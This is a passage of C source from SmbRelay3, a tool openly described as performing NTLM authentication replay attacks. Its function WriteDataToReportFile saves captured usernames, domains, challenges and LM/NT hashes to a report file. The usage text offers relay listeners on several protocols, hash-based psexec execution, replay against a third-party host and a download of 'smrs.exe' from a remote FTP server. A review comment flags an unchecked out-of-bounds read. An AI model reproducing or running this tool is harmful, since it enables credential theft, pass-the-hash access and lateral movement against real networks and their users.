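                ioctlsocket(destination, FIONBIO, &tmp);
                #else
                ioctl(destination, FIONBIO, (char *)&tmp);
                #endif
                tv.tv_sec = timeout;
                tv.tv_usec = 0;
                FD_ZERO(&fds);
                FD_SET(destination, &fds);
                sel=select((int)destination+1,&fds,0,0,&tv);
                if (sel>0)
                        i=recv(destination, (char *)destinationBuffer, MaxReadSize, 0);
                /* restore blocking mode whether or not a reply arrived */
                tmp=0;
                #ifdef WIN32
                ioctlsocket(destination, FIONBIO, &tmp);
                #else
                ioctl(destination, FIONBIO, (char *)&tmp);
                #endif
                if (sel<=0) return(-1);
        } else {
                i=recv(destination, (char *)destinationBuffer, MaxReadSize, 0);
        }
        if (debug)
        {
                printf("[*] received: %i bytes\n",i);
                DumpMem(destinationBuffer,i);
        }
        return(i);
}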
00335 
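/* Append the NUL-terminated string s to dst without writing past cap bytes. */
static void AppendStr(char *dst, size_t cap, const char *s)
{
        size_t used = strlen(dst);
        if (used < cap)
                snprintf(dst + used, cap - used, "%s", s);
}

/* Append count bytes as lowercase two-digit hex to dst, stopping early rather
 * than writing past cap bytes. */
static void AppendHexBytes(char *dst, size_t cap, const unsigned char *bytes, int count)
{
        size_t used = strlen(dst);
        int i;
        for (i = 0; i < count; i++) {
                if (used + 3 > cap)     /* two digits plus the terminator */
                        break;
                snprintf(dst + used, cap - used, "%02x", bytes[i]);
                used += 2;
        }
}

/*
 * Append one captured NTLM authentication to the report file as
 *   #SOURCEIPADDRESS:DOMAIN:WORKSTATION:USERNAME:challenge:LMHASH:NTLMHASH
 *   <ip>:<domain>:<workstation>:<user>:<16 hex>:<48 hex>:<48 hex>
 * The header line is written before every record, as before.
 *
 * lpLogFileFilename  report file, opened in append mode.
 * NtlmAuthResponse   the client's NTLM type-3 message; user, domain and
 *                    workstation are extracted with GetNTLMPacketInfo().
 * SourceIpAddress    textual client address (NULL prints as empty).
 * challenge          the 8-byte server challenge the responses were made for.
 *
 * Nothing is written if any required pointer is NULL or the file cannot be
 * opened (a message is printed in that case).
 *
 * Fixes: fopen() was unchecked, so an unwritable report path crashed in
 * fwrite(); the record was built with sprintf/strcat into a 1 KB buffer with
 * no bound; and the record was never newline-terminated, so the next call's
 * header line was glued onto the end of the previous record.
 *
 * NOTE(review): lmResponse.offset / ntResponse.offset come from the client's
 * packet and are used here without a check against the packet length, which
 * this function is not given; a malformed response can make these reads go
 * out of bounds.
 */
void WriteDataToReportFile(char *lpLogFileFilename, tSmbNtlmAuthResponse* NtlmAuthResponse, char *SourceIpAddress,unsigned char *challenge)
{
        char buffer[1024];
        FILE *LogFile=NULL;
        char UserName[256];
        char Domain[256];
        char Workstation[256];
        const unsigned char *p;
        static const char header[] = "#SOURCEIPADDRESS:DOMAIN:WORKSTATION:USERNAME:challenge:LMHASH:NTLMHASH\n";

        if (!lpLogFileFilename || !NtlmAuthResponse || !challenge)
                return;

        LogFile=fopen(lpLogFileFilename,"a+");
        if (!LogFile) {
                printf("[-] Unable to open report file %s\n",lpLogFileFilename);
                return;
        }
        fwrite(header,sizeof(header)-1,1,LogFile);

        /* pre-terminate in case GetNTLMPacketInfo leaves a field untouched */
        UserName[0] = Domain[0] = Workstation[0] = '\0';
        GetNTLMPacketInfo(NtlmAuthResponse, UserName, Domain, Workstation, 0);

        /* snprintf always terminates; an overlong record is truncated rather
         * than overrunning the buffer */
        snprintf(buffer, sizeof(buffer), "%s:%s:%s:%s:",
                 SourceIpAddress ? SourceIpAddress : "", Domain, Workstation, UserName);
        //Challenge:
        AppendHexBytes(buffer, sizeof(buffer), challenge, 8);
        AppendStr(buffer, sizeof(buffer), ":");
        //LM HASH
        p=(const unsigned char *)NtlmAuthResponse + NtlmAuthResponse->lmResponse.offset;
        AppendHexBytes(buffer, sizeof(buffer), p, 24);
        AppendStr(buffer, sizeof(buffer), ":");
        //NT HASH
        p=(const unsigned char *)NtlmAuthResponse + NtlmAuthResponse->ntResponse.offset;
        AppendHexBytes(buffer, sizeof(buffer), p, 24);
        AppendStr(buffer, sizeof(buffer), "\n");

        fwrite(buffer,strlen(buffer),1,LogFile);
        fclose(LogFile);
}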
00371 
00372 
/* Finish the current console line: with verbose output a newline is emitted;
 * otherwise the line is blanked in place (a run of spaces followed by a
 * carriage return) so the next progress message overwrites it.  The parameter
 * shadows the file-level `verbose`; the caller's value is what is honoured. */
void CleanLine(int verbose)
{
        const char *eol = (verbose > 0)
                ? "\n"
                : "                                                                              \r";
        fputs(eol, stdout);
}
00378 
00379 
/* Print the program name, copyright line and project URL to stdout. */
void Banner(void)
{
        static const char *const lines[] = {
                "SmbRelay3 - NTLM Authentication replay attacks\n",
                " (c) 2007 - 2008 Andres & Miguel Tarasco \n",
                " Web Site - http://www.tarasco.org\n\n"
        };
        size_t k;
        for (k = 0; k < sizeof(lines) / sizeof(lines[0]); k++)
                fputs(lines[k], stdout);
}
00386 
/* Print the command-line synopsis to stdout and terminate the process with
 * exit status 1.  The text is emitted line by line from a table; none of the
 * lines contain format directives.  The --ProxySMB line was commented out in
 * the original help text and is left out here as well. */
void usage(void){
        static const char *const lines[] = {
                "Usage: SMBRelay3.exe <binding> [options]\n\n",
                "Binding Parameters:\n",
                "   --ListForSMBRequests         (Wait for incomming connections against port 445)\n",
                "   --ListForHTTPRequests        (Wait for incomming connections against port 80)\n",
                "   --ListForSMTPRequests        (Wait for incomming connections against port 25)\n",
                "   --ListForIMAPRequests        (Wait for incomming connections against port 143)\n",
                "   --ListForPOP3Requests        (Wait for incomming connections against port 110)\n",
                "   --psexec <host> <username> <password>  (psexec like tool)\n",
                "   --psexec <host> <username> <:NTLMHash> (psexec like tool)\n",
                "\nOptional Parameters\n",
                "   --AlternativeSrcPort <port>  (Listen under different Port)\n",
                "   --AlternativeDstPort <port>  (Connect to a different SMB Port)\n",
                "   --SMBDestinationHost <host>  (Replay attack against third part host)\n",
                "   --SrcHostname        <host>  (Spoof incoming client name for Win2k (default smbrelay)\n",
                "   --ftp <hostname> <port> <user> <pass> (download smrs.exe from remote ftp server)\n",
                "   --v[v]                       (Displays verbose information )\n",
                "\n",
                "Example: smrelay3.exe --ListForHTTPRequests --AlternativeSrcPort 8080 --SMBDestinationHost dc.mydomain.com\n"
        };
        size_t k;
        for (k = 0; k < sizeof(lines) / sizeof(lines[0]); k++)
                fputs(lines[k], stdout);
        exit(1);
}
00414 
00415 
